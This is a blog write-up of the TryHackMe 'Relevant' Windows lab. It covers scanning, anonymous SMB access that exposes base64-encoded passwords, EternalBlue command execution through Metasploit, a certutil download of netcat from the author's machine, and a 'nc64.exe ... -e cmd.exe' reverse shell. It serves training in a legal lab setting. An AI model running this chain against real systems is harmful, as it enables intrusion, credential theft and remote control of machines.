u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Relevant

Writeup about the Tryhackme Windows machine Relevant. This is one of the two penetration testing challenges on the path offensive pentesting.

I rooted the machine in 2 ways one using the intended method and another one using Eternal Blue.

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.πŸ˜„ -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 18:05 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 3.20% done; ETC: 18:10 (0:04:02 remaining)
Nmap scan report for 10.10.πŸ˜„
Host is up (0.052s latency).
Not shown: 65527 filtered ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
/tcp  open  ssl/ms-wbt-server?
|_sslv2-drown: 
49663/tcp open  http               Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49666/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2016 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 701.09 seconds

Ports open 80,135,139,445,49663,49666 and 49668. Nmap says that is vulnerable to eternal blue (CVE-2017-0143) so soon or later I am going to check that.

Enumerating port 80:

alt text

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.πŸ˜„       
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.πŸ˜„
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/21 18:06:04 Starting gobuster in directory enumeration mode
===============================================================
/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]
Progress: 42833 / 220561 (19.42%)              [ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/38055": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/ewk": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/002024": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/scottrade": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/partner_logos": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/fnews": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/18631": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/001858": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/Security-HOWTO": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/06/21 18:09:34 [!] Get "http://10.10.πŸ˜„/002030": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/**http%3A            (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog    (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 3420]
/s%26p                (Status: 400) [Size: 3420]
/%3FRID%3D2671        (Status: 400) [Size: 3420]
/devinmoore*          (Status: 400) [Size: 3420]
/200109*              (Status: 400) [Size: 3420]
/*sa_                 (Status: 400) [Size: 3420]
/*dc_                 (Status: 400) [Size: 3420]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 3420]
/Chamillionaire%20%26%20Paul%20Wall-%20Get%20Ya%20Mind%20Correct (Status: 400) [Size: 3420]
/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY%29 (Status: 400) [Size: 3420]
/DJ%20Haze%20%26%20The%20Game%20-%20New%20Blood%20Series%20Pt (Status: 400) [Size: 3420]                   
/http%3A%2F%2Fradar   (Status: 400) [Size: 3420]                                                           
/q%26a2               (Status: 400) [Size: 3420]                                                           
/login%3f             (Status: 400) [Size: 3420]                                                           
/Shakira%20Oral%20Fixation%201%20%26%202 (Status: 400) [Size: 3420]                                        
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 3420]                                                  
/http%3A%2F%2Fweblog  (Status: 400) [Size: 3420]                                                           
/http%3A%2F%2Fswik    (Status: 400) [Size: 3420]                                                           
                                                                                                           
===============================================================
2021/06/21 18:47:06 Finished
===============================================================

Also enumerated the port 49663 with the same results, with the exception of the url path nt4wrksv

Enumerating shares

smbclient --no-pass -L //10.10.πŸ˜„

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	nt4wrksv        Disk      
SMB1 disabled -- no workgroup available

Testing the anonymous login to the share nt4wrksv

smbclient --no-pass //10.10.πŸ˜„/nt4wrksv
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

		7735807 blocks of size 4096. 5139864 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)

Worked and inside there is a passwords.txt file with base 64 encoding user/password credentials:

cat passwords.txt                                                   1 β¨―
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 --decode
Bob - !P@$$W0rD!123

echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 --decode
Bill - Juw4nnaM4n420696969!$$$ 

I tried to use a rdesktop/freerdp with the credentials but both fail. Looking to the xfreerdp traces I got some interesting error messages:

With Bill:

[19:17:56:153] [78876:78877] [ERROR][com.freerdp.core] - transport_ssl_cb:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_CERTAINLY_EXPIRED [0x0002000F]
[19:17:56:153] [78876:78877] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:14094438:SSL routines:ssl3_read_bytes:tlsv1 alert internal error

With Bob

[19:20:41:008] [78936:78937] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: ConexiΓ³n reinicializada por la mΓ‘quina remota
[19:20:41:008] [78936:78937] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[19:20:41:008] [78936:78937] [ERROR][com.freerdp.core] - freerdp_post_connect failed

So the Bill credentials are expired ?

2 - Vulnerability Identification

Taking into consideration the new credentials I tested different eternal blue exploits with metasploit But only this worked for me:

Module options (auxiliary/admin/smb/ms17_010_command):

   Name                  Current Setting                                 Required  Description
   ----                  ---------------                                 --------  -----------
   COMMAND               whoami                       yes       The command you want to execute on the remote host
   DBGTRACE              false                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists  yes       List of named pipes to check
                         /named_pipes.txt
   RHOSTS                10.10.πŸ˜„                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445                                             yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                  no        The service display name
   SERVICE_NAME                                                          no        The service name
   SMBDomain             .                                               no        The Windows domain to use for authentication
   SMBPass               !P@$$W0rD!123                                   no        The password for the specified username
   SMBSHARE              C$                                              yes       The name of a writeable share on the server
   SMBUser               Bob                                             no        The username to authenticate as
   THREADS               1                                               yes       The number of concurrent threads (max one per host)
   WINPATH               WINDOWS                                         yes       The name of the remote Windows directory

Running the exploit:

msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.πŸ˜„:445     - Authenticating to 10.10.πŸ˜„ as user 'Bob'...
[*] 10.10.πŸ˜„:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.πŸ˜„:445     - Built a write-what-where primitive...
[+] 10.10.πŸ˜„:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.πŸ˜„:445     - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.πŸ˜„:445     - Getting the command output...
[*] 10.10.πŸ˜„:445     - Executing cleanup...
[+] 10.10.πŸ˜„:445     - Cleanup was successful
[+] 10.10.πŸ˜„:445     - Command completed successfully!
[*] 10.10.πŸ˜„:445     - Output for "whoami":

nt authority\system


[*] 10.10.πŸ˜„:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Great executing as system so I got a half eternal blue exploit.

3 - Exploit

So using the juicy eternal blue RCE as system, I tried different payloads but anyone worked. Later I discovered that the machine has an AV running.

msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.πŸ˜„:445     - Authenticating to 10.10.πŸ˜„ as user 'Bob'...
[*] 10.10.πŸ˜„:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.πŸ˜„:445     - Built a write-what-where primitive...
[+] 10.10.πŸ˜„:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.πŸ˜„:445     - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.πŸ˜„:445     - Getting the command output...
[*] 10.10.πŸ˜„:445     - Executing cleanup...
[+] 10.10.πŸ˜„:445     - Cleanup was successful
[+] 10.10.πŸ˜„:445     - Command completed successfully!
[*] 10.10.πŸ˜„:445     - Output for "sc query WinDefend":


SERVICE_NAME: WinDefend 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 4  RUNNING 
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Disabling the AV was not possible, [SC] OpenService FAILED 5: Access is denied.

The strategy was to upload a simple nc precompiled for windows to stablish a reverse shell to my machine.

First setup a python server with the nc .exe precompiled:

python3 -m http.server 80

To download the nc64.exe precompiled to the Windows machine I used certutil to download the file to the path C:\Windows\Temp\nc64.exe because normally you can save/execute things on this path.

msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 'certutil -urlcache -split -f "http://10.9.πŸ˜„:80/nc64.exe" C:\Windows\Temp\nc64.exe'
COMMAND => certutil -urlcache -split -f "http://10.9.πŸ˜„:80/nc64.exe" C:\Windows\Temp\nc64.exe
msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.πŸ˜„:445     - Authenticating to 10.10.πŸ˜„ as user 'Bob'...
[*] 10.10.πŸ˜„:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.πŸ˜„:445     - Built a write-what-where primitive...
[+] 10.10.πŸ˜„:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.πŸ˜„:445     - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.πŸ˜„:445     - Getting the command output...
[*] 10.10.πŸ˜„:445     - Executing cleanup...
[+] 10.10.πŸ˜„:445     - Cleanup was successful
[+] 10.10.πŸ˜„:445     - Command completed successfully!
[*] 10.10.πŸ˜„:445     - Output for "certutil -urlcache -split -f "http://10.9.πŸ˜„:80/nc64.exe" C:\Windows\Temp\nc64.exe":

****  Online  ****
  0000  ...
  b0d8
CertUtil: -URLCache command completed successfully.


[*] 10.10.πŸ˜„:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With the nc on the windows machine the next step was to setup a nc listener and finally triggering the .exe file with eternal blue to get a reverse shell to my machine

msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 'C:\Windows\Temp\nc64.exe 10.9.πŸ˜„ 4243 -e cmd.exe'
COMMAND => C:\Windows\Temp\nc64.exe 10.9.πŸ˜„ 4243 -e cmd.exe
msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.10.πŸ˜„:445     - Authenticating to 10.10.πŸ˜„ as user 'Bob'...
[*] 10.10.πŸ˜„:445     - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.πŸ˜„:445     - Built a write-what-where primitive...
[+] 10.10.πŸ˜„:445     - Overwrite complete... SYSTEM session obtained!
[+] 10.10.πŸ˜„:445     - Service start timed out, OK if running a command or non-service executable...
[-] 10.10.πŸ˜„:445     - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] 10.10.πŸ˜„:445     - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.10.πŸ˜„:445     - Getting the command output...
[*] 10.10.πŸ˜„:445     - Command finished with no output
[*] 10.10.πŸ˜„:445     - Executing cleanup...
[+] 10.10.πŸ˜„:445     - Cleanup was successful
[+] 10.10.πŸ˜„:445     - Command completed successfully!
[*] 10.10.πŸ˜„:445     - Output for "C:\Windows\Temp\nc64.exe 10.9.πŸ˜„ 4243 -e cmd.exe":



[*] 10.10.πŸ˜„:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Flags:

C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4πŸ˜„}

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5πŸ˜„}

4 - Post-Exploitation and privilege eescalation

Because Eternal Blue was already running as System no privilege escalation is needed.

The intended way was to upload files to the share nt4wrksv and reflected/triger on the another web server running on the port 49663 so you can upload a reverse shell to the share and later trigger the shell navigating to the url. After that you can elevate privileges using printspoof. I was lazy today and I don’t want to write the intended way too :P


Thanks for reading!